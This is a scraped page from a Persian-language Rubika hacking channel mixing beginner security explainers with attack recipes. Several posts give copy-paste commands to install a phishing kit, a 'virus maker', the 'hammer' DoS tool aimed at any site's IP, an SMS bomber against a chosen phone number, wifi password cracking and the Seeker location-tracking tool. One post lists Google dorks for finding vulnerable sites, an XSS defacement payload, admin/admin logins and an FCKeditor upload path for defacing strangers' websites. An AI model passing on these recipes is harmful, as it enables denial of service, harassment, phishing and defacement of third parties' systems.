💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
@ZERO____DAY
2Kدنبال کننده

آموزش زبانهای مختلف از جمله پایتون ، جاوا و... هک اخلاقی و امنیت ، برنامه_نویسی کد_نویسی و...
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
large_blue_diamond️ جهت تبادل و تبلیغات: @ZERO___DAY
large_blue_diamond️ ارتباط با مدیریت: @ZERO___DAY
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
#تابع_قوانین_جمهوری_اسلامی_ایران
#تابع_قوانین_روبیکا
مشاهده کانال پیام‌رسان
درباره ما
وبلاگ
اپلیکیشن ها
دانلود روبیکا
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
دنبال کننده2K
۱۳ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerتست نفوذ با ترموکسcomputer

pkg update && pkg upgrade

pkg install git

pkg install curl

pkg install python

pkg install unstable-repo

pkg install metasploit

pkg install nmap

pkg install wireshark

pkg install aircrack-ng

pkg install hydra

pkg install git
git clone https://github.com/sundowndev/Phishing-Frenzy.git

cd Phishing-Frenzy

pip install -r requirements.txt

pkg install sqlmap


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۳ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerساخت ویروسcomputer

>apt upgrade

>apt upgrade

>pkg install git -y

>pkg install python -y

>pkg install python2 -y

>apt-get install git

>git clone https://github.com/d3L3t3dOn3/Malicious

>cd Malicious

>unzip Malicious.zip

>cd Malicious

>chmod +x *

>pip2 install -r requirements.txt

>python2 malicious.py

@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۳ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerدیداس به سایتcomputer

apt update

apt upgrade

pkg install git -y

pkg install python

pkg install python2

pkg install python3

git clone https://github.com/cyweb/hammer

cd hammer

python3 hammer.py -s (IP)

small_blue_diamondبه جای (IP) باید ایپی سایت مورد نظر خودتونو بزاری.مثال:arrow_lower_left

python3 hammer.py -s 10.30.170.12

small_blue_diamondبرای گرفتن ایپی سایت مورد نظر از کد زیر استفاده کنیدarrow_lower_left
ping (آدرس سایت)
مثال :arrow_lower_left
ping google.com


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۳ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
آموزش هک - جلسه : هر چیزی یک آدرس دارد (مفهوم IP) globe_with_meridians

سلام رفقای عزیز! خوشحالم که تصمیم گرفتید وارد دنیای جذاب امنیت سایبری بشید. مثل هر مهارتی، هک کردن هم پایه و اساس دارد و بدون فهمیدن آنها، هیچ‌وقت نمی‌تونید هکر بشید.

اولین و مهم‌ترین چیزی که باید یاد بگیرید، IP Address یا همان آدرس پروتکل اینترنت است.

IP چیست؟
تصور کنید می‌خواهید نامه‌ای به دوستتان بفرستید. برای اینکه نامه به دست او برسد، باید آدرس دقیق خانه‌اش را روی پاکت بنویسید، درست است؟
در دنیای اینترنت هم، هر دستگاهی (مثل گوشی، لپ‌تاپ یا سرور) که به اینترنت وصل می‌شود، یک آدرس منحصر‌به‌فرد دارد که به آن می‌گوییم IP.

1234 شکل ظاهری IP:
یک آدرس IP معمولاً یک سری عدد است که با نقطه از هم جدا شده‌اند. مثلاً:
192.168.1.1

dart چرا IP برای هکر مهم است؟
یک هکر برای اینکه بتواند به یک سیستم حمله کند، اول باید IP آن سیستم را پیدا کند. بدون دانستن IP، شما نمی‌دانید به "خانه" کی در اینترنت در می‌زنید!

white_check_mark خلاصه :
۱. هر دستگاه متصل به اینترنت یک IP دارد.
۲. IP مثل آدرس خانه است.
۳. برای حمله یا تست نفوذ، اول باید IP هدف را پیدا کنیم.

bulb تمرین:
سعی کنید IP گوشی یا کامپیوتر خودتان را پیدا کنید. (می‌توانید در گوگل عبارت "What is my IP" را جستجو کنید).


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۴ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
small_blue_diamondsmall_blue_diamondsms با ترموکسsmall_blue_diamondsmall_blue_diamond

> apt update && apt upgrade

> pkg install git python -y

> pkg install python2 -y

> pkg install python3 -y

> cd  /sdcard/Download

> unzip ni_bomber.zip

> cd ni_bomber

> pip3 install -r requirements.txt

> chmod +x *

> python3 ni_bomber.py


با این کد میتونید sms رگباری برای اون شماره مورد نظر ارسال کن.


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۶ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
🛡اسکن ساده پورت روی شبکه خودت:🛡
import socket

target = "127.0.0.1"
ports = [21, 22, 80, 443]

for port in ports:
    s = socket.socket()
    s.settimeout(0.5)
    result = s.connect_ex((target, port))
    if result == 0:
        print(f"Port {port} open")
    else:
        print(f"Port {port} closed")
    s.close()

@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۶ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerحالا که با هک اخلاقی اشنا شدین بریم یکم با دیدگاه حرفه‌ای تر بهش نگاه کنیم:computer

فرآیند هک اخلاقی یه رویکرد سیستماتیک و چند مرحله‌ای داره که معمولا شامل این مرحله‌ها هست:

۱. شناسایی (Reconnaissance):

این مرحله، اولین قدم توی حمله هست. اینجا، هدف جمع‌آوری اطلاعات ممکن درباره هدف هست. این اطلاعات میتونن شامل این موارد باشن:

اطلاعات فعال (Active Reconnaissance): اسکن پورت‌ها (Port Scanning) برای شناسایی سرویس‌های در حال اجرا، نقشه‌برداری شبکه (Network Mapping)، شناسایی سیستم‌عامل‌ها (OS Fingerprinting) و نرم‌افزارهای مورد استفاده. ابزارهایی مثل Nmap، Nessus و OpenVAS توی این مرحله خیلی کاربردی هستن.

اطلاعات غیرفعال (Passive Reconnaissance): جمع‌آوری اطلاعات از منابع عمومی مثل وب‌سایت شرکت، پروفایل‌های شبکه‌های اجتماعی کارکنان، WHOIS records، و استفاده از موتورهای جستجو (مثل Google Dorking) برای پیدا کردن اطلاعات حساس که به اشتباه منتشر شده.

۲. اسکن (Scanning):

بعد از جمع‌آوری اطلاعات اولیه، مرحله اسکن برای شناسایی دقیق‌تر آسیب‌پذیری‌ها شروع میشه. این شامل:

اسکن آسیب‌پذیری (Vulnerability Scanning): استفاده از ابزارهای خودکار برای شناسایی حفره‌های امنیتی شناخته شده توی سیستم‌ها، برنامه‌ها و پیکربندی‌ها.
اسکن شبکه (Network Scanning): شناسایی دستگاه‌های فعال توی شبکه، پورت‌های باز و سرویس‌های در حال اجرا.

۳. دستیابی به سیستم (Gaining Access):

این مرحله قلب فرآینده، جایی که هکر تلاش میکنه با سوءاستفاده از
آسیب‌پذیری‌های کشف شده، به سیستم هدف نفوذ کنه. معمولا از روش‌های زیر استفاده میشه:

استفاده از آسیب‌پذیری‌های نرم‌افزاری: استفاده از باگ‌ها و ضعف‌های امنیتی توی برنامه‌های کاربردی، سیستم‌عامل‌ها، یا سرویس‌های شبکه (مثل SQL Injection, Cross-Site Scripting (XSS), Buffer Overflows). ابزارهایی مثل Metasploit Framework ابزارهای قدرتمندی برای این کار فراهم می‌کنن.

مهندسی اجتماعی (Social Engineering): فریب دادن کاربران برای افشای اطلاعات حساس (مثل رمز عبور) از طریق ایمیل‌های فیشینگ (Phishing)، تماس‌های تلفنی جعلی، یا حتی حضوری.

حملات Brute Force و Dictionary Attacks: حدس زدن رمزهای عبور از طریق امتحان کردن تعداد زیادی رمز احتمالی.

۴. حفظ دسترسی (Maintaining Access):

بعد از نفوذ موفقیت‌آمیز، هکر اخلاقی تلاش می‌کنه دسترسی خودشو حفظ کنه تا بتونه کارهای بیشتری انجام بده یا در آینده دوباره دسترسی پیدا کنه. این میتونه شامل نصب بدافزار (Malware) مثل روت‌کیت (Rootkit) یا ایجاد درب‌های پشتی (Backdoors) باشه.

۵. پاکسازی ردپا (Covering Tracks):

توی یه حمله مخرب، هکر تلاش می‌کنه هیچ اثری از خودش به جا نزاره. اما توی هک اخلاقی، این مرحله بیشتر به معنی مستندسازی دقیق هست. هکر اخلاقی باید همه اقداماتش، آسیب‌پذیری‌های کشف شده، نحوه دستیابی به اونا و شواهدی که جمع‌آوری کرده رو به طور کامل ثبت کنه تا بتونه گزارشی جامع به کارفرما ارائه بده. البته، بعضی از تکنیک‌های پاکسازی ردپا (مانند حذف لاگ‌ها) در این مرحله برای شبیه‌سازی حملات واقعی ممکن است انجام شوند، اما هدف اصلی همچنان مستندسازی است.

۶. گزارش‌دهی (Reporting):

این مهم‌ترین بخش برای کارفرماعه. گزارش نهایی باید شامل این چیزا باشه:

خلاصه‌ای مدیریتی (Executive Summary) از وضعیت کلی امنیتی.
شرح دقیق آسیب‌پذیری‌های کشف شده، همراه با شدت (Severity) و ریسک (Risk) هرکدوم.
مراحل دقیق طی شده برای کشف و بهره‌برداری از هر آسیب‌پذیری (شامل ابزارها و تکنیک‌های استفاده شده).
شواهد (Proof of Concept) برای هر آسیب‌پذیری.
توصیه‌های مشخص و عملی برای رفع هر آسیب‌پذیری، اولویت‌بندی شده بر اساس ریسک.


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۱۸ فروردین
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerاموزش هک وای فایcomputer

1-کارت شبکه خود را به سیستم وصل کنید.
2-وارد کالی لینوکس شوید
3-یک ترمینال باز کنید
4-توش دستورات زیر را بنویسیدpoint_down
sudo apt install airmon-ng
بعدشpoint_down
airdump-ng wlan0
بعدش مک و ادرس ایپی اون ایپی رو کپی کنیدpoint_down
aircrack-ng wlan0
بعدش اون مک و ادرس ایپی رو اونجا وارد میکنیم و شروع میکنه به کرک کردن پسوردboom
حداقل ۱۰تا ۱۵ دقیقه طول میکشه بستگی به قوی بودن پسورد دارهwhite_check_mark


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۳ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
کد پاکسازی پیام‌های گروه:

from rubpy import Client
import asyncio

SESSION_NAME = "clear_Group"
GROUP_GUID = ""

async def main():
async with Client(SESSION_NAME) as app:
creation_id = None
try:
resp = await app.get_messages_interval(GROUP_GUID, "0")
for msg in resp.messages or []:
update = getattr(msg, "original_update", {})
if update.get("type") == "Event" and update.get("event_data", {}).get("type") == "GroupCreated":
creation_id = msg.message_id
print(f"پیام «گروه ایجاد شد.» پیدا شد: {creation_id}")
break
except:
pass

if not creation_id:
if input("پیام «گروه ایجاد شد» پیدا نشد، ادامه می‌دهید؟ (y/N): ").strip().lower() != "y":
return

print("شروع پاکسازی کامل گروه از آخر به اول...\n")
deleted = 0
mid = "9999999999999999"

while True:
try:
resp = await app.get_messages_interval(GROUP_GUID, mid)
messages = resp.messages or []
if not messages:
break
except:
break

batch = []
for msg in messages:
if str(msg.message_id) == str(creation_id):
continue
update = getattr(msg, "original_update", {})
if update.get("type") == "Event" and update.get("event_data", {}).get("type") == "GroupCreated":
continue
batch.append(msg.message_id)

for i in range(0, len(batch), 25):
try:
await app.delete_messages(GROUP_GUID, batch[i:i+25])
count = len(batch[i:i+25])
deleted += count
print(f"حذف شد: {count} پیام | مجموع: {deleted}")
await asyncio.sleep(1.3)
except Exception as e:
if "INVALID_AUTH" in str(e) or "ERROR_GENERIC" in str(e):
print("""در اجرای عملیات مشکلی پیش آمده است که ممکن است به دلایل زیر باشد:
۱. شناسه (GUID) گروه نامعتبر است.
۲. اکانت ادمین گروه نیست.
۳. اکانت ادمین است اما دسترسی «حذف پیام همه اعضا» را ندارد.""")
return

if messages:
mid = messages[-1].message_id

if any(str(m.message_id) == str(creation_id) for m in messages):
break
await asyncio.sleep(0.5)

print(f"پاکسازی گروه با موفقیت انجام شد.")
print(f"تعداد پیام حذف شده: {deleted}")

asyncio.run(main())

پیش نیاز:
pip install rubpy

توضیحات:
۱. در بخش SESSION_NAME ، نام سشن مربوط به حساب کاربری خود را وارد کنید و سشن را کنار کد قرار دهید. (سشن های کتابخانه‌ی rubpy با پسوند rp. هستند.)
چنانچه تاکنون سشنی ایجاد نکرده‌اید، در قسمت SESSION_NAME تغییری ایجاد نکنید تا سشن حساب شما ساخته شود.

۲. در بخش GROUP_GUID ، شناسه (GUID) گروه هدف را وارد کنید.
شناسه (GUID) های گروه معمولاً با پیشوند (g0) آغاز می‌شوند. نمونه‌ای معتبر از این قالب به شکل زیر است:
g0GaJzm0e69791b92ba65303d9798df0
برای به‌دست آوردن GUID کانال خود، می‌توانید از این فیلم کمک بگیرید.

پس از اجرای کد، همه‌ی پیام های گروه به جز پیام "گروه ایجاد شد." حذف می‌شود و گروه پاکسازی می‌گردد. مزیت این کد این است که به عنوان مثال اگر شما گروهی را خریداری کرده باشید و قصد پاکسازی آن را دارید، می‌توانید با این کد گروه خود را پاکسازی و خام کنید؛ زمان اتمام پاکسازی گروه به تعداد پیام های گروه بستگی دارد.

نکات کلیدی:
۱. حساب کاربری شما باید از مدیران گروهِ هدف باشد و دسترسیِ حذف پیام را برای پاکسازی گروه، دارا باشد.
۲. از این کد نمی‌توان برای پاکسازی کانال استفاده کرد، برای پاکسازی کانال خود، از این کد استفاده نمایید.


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۳ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
کد پروفایل دوگانه یا همان باگ پروفایل:

from rubpy import Client

SESSION_NAME = "mySession"

TARGET = "me" # اگر می‌خواهید برای کانال / گروه پروفایل بگذارید، به جای me گوید موردنظر را وارد کنید.

AB = "IMG_20260318_134002_738.jpg" # عکسی که می‌خواهید از دور نمایش داده شود

CD = "IMG_20260317_185440_871.jpg" # عکسی که می‌خواهید از نزدیک نمایش داده شود
try:
with Client(SESSION_NAME) as client:
up = client.upload(AB)
tumb = up.file_id
result = client.upload_avatar(TARGET, CD, tumb)
print("عملیات با موفقیت انجام شد.\n", result)

except Exception as e:
if "INVALID_AUTH" in str(e):
print("خطا در اجرای عملیات، ربات دسترسی به گروه / کانال مورد نظر را ندارد.")
elif "INVALID_INPUT" in str(e):
print("خطا در اجرای عملیات، ورودی یا گوید وارد شده نامعتبر است.")
elif "File not found" in str(e):
print("خطا در اجرای عملیات، فایل‌های تصویری مشخص شده یافت نشدند. لطفاً از قرار داشتن تصاویر در کنار کد و صحت نام آن‌ها اطمینان حاصل فرمایید.")
else:
print("خطا در اجرای عملیات:", e)

پیش نیاز:
pip install rubpy

روش نصبِ کتابخانه در شرایط فعلی:
pip install -i https://mirror-pypi.runflare.com/simple rubpy

توضیحات:
۱. در بخش SESSION_NAME ، نام سشن مربوط به حساب کاربری خود را وارد کنید و سشن را کنار کد قرار دهید. (سشن های کتابخانه‌ی rubpy با پسوند rp. هستند.)
چنانچه تاکنون سشنی ایجاد نکرده‌اید، در قسمت SESSION_NAME تغییری ایجاد نکنید تا سشن حساب شما ساخته شود.

۲.  در بخش TARGET، گوید (GUID) مربوط به کانال یا گروه موردنظر را وارد کنید؛ اگر می‌خواهید برای اکانت خود پروفایل تنظیم کنید، در قسمت TARGET تغییری ایجاد نکنید.
برای به دست آوردنِ GUID گروه یا کانال خود، می‌توانید از این فیلم کمک بگیرید.

۳. دو عکس مورد نظر خود را کنار کد قرار داده و بر اساس کامند ها، نام دو عکسِ مورد نظر را در قسمت های AB و CD وارد کنید.

پس از اجرای کد، پروفایل مورد نظر به صورت دوگانه تنظیم خواهد شد.

نکته کلیدی:
حساب کاربری شما باید از مدیران کانال یا گروهِ هدف باشد و دسترسیِ تغییر اطلاعات را برای تنظیم پروفایل، دارا باشد.


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۳ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
dart کاربردهای اصلی Seeker:


. جمع‌آوری اطلاعات موقعیت مکانی (Location Tracking)

· دریافت مختصات GPS دقیق
· شناسایی موقعیت جغرافیایی قربانی
· نمایش روی نقشه

۲. جمع‌آوری اطلاعات دستگاه (Device Information)
· سیستم عامل و نسخه مرورگر
· رزولوشن صفحه نمایش
· مدل دستگاه
· زبان سیستم

۳. شبیه‌سازی صفحات لاگین معروف
· صفحات جعلی شبیه به:
· تلگرام
· اینستاگرام
· فیسبوک
· گیت‌هاب
· و سایر پلتفرم‌ها

۴. تست آگاهی امنیتی
· آموزش به کاربران برای شناسایی صفحات فیشینگ
· تست حساسیت کارمندان در سازمان‌ها

warning️ هشدارهای اخلاقی و قانونی:
· فقط برای اهداف آموزشی استفاده شود
· هرگز بدون مجوز روی دیگران استفاده نکنید
· استفاده غیرقانونی جرم محسوب می‌شود
· فقط روی دستگاه‌های خودتان یا با اجازه کتبی تست کنید

🛡️ کاربرد حرفه‌ای:
· تست نفوذ سازمانی (Penetration Testing)
· ارزیابی امنیتی سامانه‌ها
· آموزش امنیت به پرسنل
· تحقیقات امنیتی
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod +x install.sh
./install.sh
و در آخر برای اجرا :
python seeker.py


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۴ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
کد ارسال کد تأیید در اعلانات ورود:

from pyrubi.methods import Methods
from pyrubi.network import Network

def validate_phone(phone):
phone = phone.replace(" ", "").replace("-", "").replace("(", "").replace(")", "").replace("+", "")

if not phone.isdigit():
print("x ERROR: Phone number should only contain digits")
return None

if phone.startswith("09") and len(phone) == 11:
phone = "98" + phone[1:]
return phone

if phone.startswith("0"):
return None

if len(phone) < 8:
print("x ERROR: Phone number is too short")
return None
elif len(phone) > 15:
print("x ERROR: Phone number is too long (max 15 digits)")
return None

return phone

while True:
while True:
raw_number = input("\niphone Enter phone number (with country code, e.g., 989123456789): ").strip()

phone_number = validate_phone(raw_number)

if not phone_number:
print("arrows_counterclockwise Please try again...")
continue

print(f"\niphone Number entered: {phone_number}")
confirm = input("white_check_mark Is this number correct? (y/n): ").strip().lower()

if confirm == 'y':
break
else:
print("arrows_counterclockwise Please enter the number again...")
continue

print("\narrows_counterclockwise Sending verification code...")

try:
result = Network(Methods(None, "android", 6, None, 2, None)).request(
method="sendCode",
input={
"phone_number": phone_number,
"pass_key": None,
"send_type": "SMS",
},
tmpSession=True
)
status = result.get('status', '')

if status == 'SendPassKey':

while True:
passkey = input("\nclosed_lock_with_key Enter 2-step verification password: ").strip()
if passkey == "":
print("x Password cannot be empty!")
continue

print("\narrows_counterclockwise Sending verification code with password...")

try:
result = Network(Methods(None, "android", 6, None, 2, None)).request(
method="sendCode",
input={
"phone_number": phone_number,
"pass_key": passkey,
"send_type": "SMS",
},
tmpSession=True
)

status = result.get('status', '')

if status == 'InvalidPassKey':
print("\nx Incorrect password!")
continue
elif status == 'OK':
print("\nwhite_check_mark SUCCESS: Verification code sent!")
print("iphone Check your phone for the verification code.")
print(f"\nbar_chart Response: \n{result}")
break
else:
print(f"\nbar_chart Response: {result}")
break

except Exception as e:
print(f"\nx ERROR: {e}")
break

elif status == 'OK':
print("\nwhite_check_mark SUCCESS: Verification code sent!")
print("iphone Check your phone for the verification code.")
print(f"\nbar_chart Response: \n{result}")
else:
print(f"\nbar_chart Response: \n{result}")

except Exception as e:
print(f"\nx ERROR: {e}")

another = input("\narrows_counterclockwise Try another number? (y/n): ").lower()
if another != 'y':
print("\nwave Goodbye!")
break

پیش‌نیاز:
pip install pyrubi

توضیحات:
با این کد می توانید کد تأیید را در اعلانات ورود بفرستید. کافی‌ست کد را اجرا کرده و در کنسول شماره و تایید دومرحله‌ایِ اکانت خود را وارد نمایید.


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۵ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
#هک سایت
beginnerاموزش هک سایت با باگ های rfu, poto , xssbeginner

beginnerباگ xss point_down🏿

oneوارد گوگل شید و دورک زیر رو سرچ میکنینpoint_down🏿

inurl:"/showcatrows.php?CategoryID="

two وقتی که این دورک رو تو گوگل سرچ کردید, تارگت هایی با باگه xss میاره که شما رو یکیشون کلیک میکنین و به اخره سایت اینو اضافه میکنینpoint_down🏿

"><marquee><h1>power</h1></mmarque

100شما بجای power که نوشتم میتونید لقب خودتون رو بنویسید

beginnerباگ poto point_down🏿

oneوارده گوگل شید و یکی از دورک های زیر رو سرچ کنیدpoint_down🏿
inurl:"poto" intext:"powered by Shop737"
inurl:"poto" intext:"powered by Bisnis7 "
inurl:"poto" intext:"powered by StudioWeb "
twoچند تا سایت میاره رو یکی به دلخواه کلیک کنید

threeبعد این رو اخره سایت اضافه کنیدpoint_down🏿
poto/upload.php

threeبعد اینتر رو بزنید

fourیه صفحه میاد ک ازتون یوزرنیم و پسوورد میخواد
که هر دو رو ادمین وارد میکنید
(admin)

100اگه درست نبود برید سراغ سایت بعدی اگرم درست بود یه صفحه باز میشه میتونید فایل اپلود کنید

exclamation️اگر زبانه
html یا php
رو بلدید ک میتونید یه فایل با فرمته
.html
exclamation️بسازید و اپلود کنید اگرم نه باید برید یاد بگیرید

beginnerباگ rfupoint_down🏿

oneوارد گوگل شید و دورک زیر رو search کنیدpoint_down🏿
inurl:frame=product_detail
twoحالا یکی از سایت هارو انتخاب کنید و آخر سایت رو پاک کنید🤟🏿

threeوقتی پاک کردید اکسپلویت زیر رو بهش اضافه کنیدpoint_down🏿
/jscripts/FCKeditor/editor/filemanager/upload/test.html

fourخب حالا دیفیس خودتون رو با پسوند .html آپلود کنیدok_hand🏿


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۵ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
*مهارت های کافی برای هکر شدن*

مرحله اول آشنایی با مفاهیم اولیه.

Network Plus
CEH
مرحله دوم آشنایی با خط فرمان های سیستم عامل ها.

Linux Commands
Windows Commands
LPIC 1 & 2
مرحله سوم آشنایی با فریمورک های نفوذ و پنتست.

Metasploit Basic
Metasploit Advanced
مرحله چهارم آشنایی با آسیب پذیری های تحت وب.

Basic of Web Penetration Testing
Advanced of Web Penetration Testing
Penetration Testing with Kali
SQL Programming & PHP/ASP Syntax
Entitty framework & .Net Core
مرحله پنجم طریقه جمع آوری اطلاعات از سطح اینترنت.

InfoGathering & OSINT
Google Hacking & Web Mapping
Social Engeenering & Man Spoofing
مرحله ششم کرک اکانت و جمع آوری اکانت.

Account Leech & Cracking
مرحله هفتم آشنایی با رمزنگاری ها و تست ضعف رمزنگاری.

Cryptography Pentesting
مرحله هشتم تکنیک های نفوذ به شبکه های زیرساختی و بیسیم.

Network & Wireless Hacking
مرحله نهم تکنیک های نفوذ و دور زدن مکانیزم های برنامه های کاربردی.

Android & iOS Penetration Testing
مرحله دهم تست نفوذ با زبان پایتون.

Python for Penetration Testing
مرحله یازدهم آشنایی یا زبان پاورشل و پتانسیل آن.

Powershell for Penetration Testing
مرحله دوازدهم تکنیک های مبهم سازی ر برنامه نویسی و رمزنگاری.

Obfuscation Methods
Encryption & Packers
مرحله سیزدهم تکنیک های ارتقاء سطح دسترسی.

Privilage Ecalation
مرحله چهاردهم تکنیک های نگهداری دسترسی و بکدور.

Persistence Methods
مرحله پانزدهم تکنیک های ضد ردیابی دسترسی.

Anti Forensic Methods
مرحله شانزدهم برنامه نویسی زبان C و سوکت نویسی.

C & Network Programming
مرحله هفدهم برنامه نویسی زبان روبی و جاوا اسکریپت.

Ruby & JavaScript Programming
مرحله هجدهم برنامه نویسی .VBScript & ActionScript

ActionScript & VBScript Programming
مرحله نوزدهم برنامه نویسی زبان ماشین.

Assembly Programming
مرحله بیستم آشنایی با ساختار فایل فرمت ها و ماژول های کرنل.

Operating System File Format
WinAPI & LinAPI Syntax
مرحله بیست و یکم برنامه نویسی .COM & DCOM

COM and DCOM Programming
مرحله بیست و دوم تحلیل ساختار فایروال های نرم افزاری و سخت افزاری.

Hardware & Software Firewall Analysis
مرحله بیست و سوم مهندسی معکوس هر برنامه ای و تکنیکی.

Advanced Reverse Engineering
مرحله بیست و چهارم اکسپلویت نویسی و دور زدن مکانیزم های دفاعی.

Advanced Exploit Development
مرحله بیست و پنجم ساختن بکدورهای روت کیت و بوت کیت.

Bootkit & Rootkit Analysis
مرحله بیست و ششم اکسپلویت نویسی سیستم عامل های گوشی ها.

Android & iOS Exploit Development
مرحله بیست و هفتم تکنیک های حملات به ماهواره ها و شنود آنها.


@ZERO____DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۶ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
computerسیستم عامل لینوکس چیست؟

در معرفی سیستم عامل لینوکس می توان گفت سیستم عامل لینوکس از قدرتمندترین سیستم عامل‌های موجود در بازار است که بصورت‌ متن باز ارائه می گردد. همچنین در بین مهندسان نرم‌افزار از محبوبیت ویژه‌ای برخوردار است.

برای آشنایی با سیستم عامل لینوکس باید بدانید که سیستم عامل unix ( یونیکس ) در سال ۱۹۷۱ توسط شرکت تلفن و تلگراف آمریکا توسعه و گسترش پیدا کرد. این سیستم عامل گران قیمت بود و همه مردم نمی‌توانستند به راحتی از آن استفاده کنند.

بنابراین سیستم لینوکس که بسیار شبیه به یونیکس و از زیر شاخه‌های آن است، به عنوان جانشین برگزیده شد. در سال ۱۹۹۱ تورالدز لینوکس هسته مرکزی لینوکس را ساخت. سیستم عامل لینوکس توسط کمپانی‌های بسیاری پشتیبانی می‌شود.
#Lxpart4


@ZERO___DAY
Please open Rubika to view this post
VIEW IN RUBIKA
edited  
۳۰ اردیبهشت
💻 | هک و امنیت | Linux | 💻
💻 | هک و امنیت | Linux | 💻
چجوری افراد مهم هک میشن ؟
مگه به اونا آموزش داده نمیشه ؟
یعنی اونا انقد سواد پایین دارن که لینک یا فایل باز و دانلود میکنن ؟


بله همه اونها آموزش ها رو دیدن و طبیعتا هیچ فایلی رو باز نمیکنن
پس این سوال پیش میاد
چجوری هک میشن ؟
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
اینجاس که زیرو کلیک وارد میشه

زیرو کلیک چیه حالا ؟

فرض کنید شما یک مسئول اسرائیلی هستید و داخل یک برنامه اسرائیلی که برنامه ملی شما هست فعالیت دارید
مثل ما که از روبیکا استفاده میکنیم و یا اپلیکیشن های دیگه مثل سروش،ایتا،بله و.......

حالا هکر های دولتی که کارشون درسته میان از آسیب پذیری زیرو دی داخل اون برنامه ملی که اون مسئول اکانت داره استفاده میکنن

و از اونجایی که برای استفاده از اپلیکیشن خود به خود دسترسی ها رو باید داد و این هکر ها میان از آسیب پذیری زیرو دی استفاده میکنن میرن سراغ اکانت اون شخص و از اون دسترسی هایی که برنامه داده استفاده میکنن و تمام اون مسئول به فاک رفت یعنی چیز به فنا رفت +1

ــــــــــــــــــــــــــــــــ

حالا این توضیحات رو کمی متفاوت از زبان سایت ایرانیکارت بشنویم point_down

حمله بدون کلیک چه نوع حمله‌ای است؟
حمله بدون کلیک (Zero-Click Attack) نوعی حمله سایبری است که بدون هیچ‌گونه اقدام یا کلیک از سوی کاربر انجام می‌شود. در این نوع حمله، تنها دریافت یک پیام، تماس یا فایل مخرب کافی‌ست تا مهاجم کنترل بخشی از سیستم قربانی را در دست بگیرد؛ بدون آن‌که کاربر حتی متوجه وقوع حمله شود.

این حملات معمولاً از طریق آسیب‌پذیری‌های ناشناخته در اپلیکیشن‌های پیام‌رسان، ایمیل، سیستم‌عامل یا حتی خدمات ابری اجرا می‌شوند. تفاوت اصلی آن‌ها با سایر حملات این است که نیازی به بازکردن لینک، بارگذاری فایل یا تایید کاربر ندارند؛ همین ویژگی باعث خواهد شد تا حمله‌های بدون کلیک بسیار دشوارتر از سایر روش‌ها شناسایی شوند و تهدیدی جدی برای حریم خصوصی افراد و سازمان‌ها به‌حساب بیایند.

حملات بدون کلیک

حمله بدون کلیک چگونه کار می‌کند؟
در بسیاری از حملات سایبری معمول، مهاجم ابتدا کاربر را فریب می‌دهد تا روی یک لینک کلیک یا پیوست مشکوکی را باز کند؛ اما در حمله بدون کلیک، هیچ تعامل انسانی نیاز نیست. این نوع حمله مستقیماً از طریق شکاف‌های امنیتی در نرم‌افزارهایی انجام می‌شود که ورودی‌های خارجی را پردازش می‌کنند؛ بدون آن‌که کاربر حتی متوجه دریافت فایل یا پیام آلوده شود.

اپلیکیشن‌هایی مانند پیام‌رسان‌ها، برنامه‌های ایمیل یا حتی برخی سرویس‌های سیستمی، معمولاً داده‌هایی را از منابع ناشناس دریافت می‌کنند و پیش از آن‌که کاربر آن‌ها را باز کند، اطلاعات را جهت نمایش آماده خواهند کرد. اگر در فرایند پردازش این داده‌ها، آسیب‌پذیری وجود داشته باشد، مهاجم می‌تواند با طراحی یک پیام یا تماس مخرب، کدی را در دستگاه قربانی اجرا کند؛ به‌عبارت‌دیگر، تنها دریافت یک پیام آلوده می‌تواند به اجرای بدافزار، غیرفعال‌کردن به‌روزرسانی‌ها یا حتی نصب باج‌افزار، بدون آن‌که پیامی باز شده یا دکمه‌ای لمس شده باشد، منجر شود.

